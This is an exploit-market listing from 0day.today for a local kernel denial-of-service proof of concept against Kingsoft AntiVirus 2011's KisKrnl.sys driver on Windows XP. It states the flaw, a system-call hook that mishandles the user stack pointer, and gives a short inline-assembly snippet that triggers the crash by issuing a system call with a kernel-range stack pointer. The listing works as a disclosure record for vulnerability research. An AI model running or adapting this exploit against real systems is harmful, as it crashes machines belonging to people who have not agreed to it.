[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Dos

Author
MJ0011
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15426
Category
dos / poc
Date add
17-01-2011
Platform
windows
# Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode D.O.S Exploit
# Date: 2011-1-16
# Author: MJ0011
# Software Link: http://cd001.www.duba.net/duba/install/2011/once/KAV110114_DOWN_9_13.exe
# Version: KingSoft AntiVirus 2011 SP5.2 with KisKrnl.sys <=2011.1.13.89
# Tested on: Windows XP SP3
 
DETAILS:
KisKrnl.sys hook the kernel function KiFastCallEntry , but is not correctly handle user stack pointer
 
EXPLOIT CODE:
 
__asm
{
mov edx , 0x80000000
mov eax , 0x101        ;id of NtTerminateProcess under Windows XP
int 0x2e
}



#  0day.today [2024-12-24]  #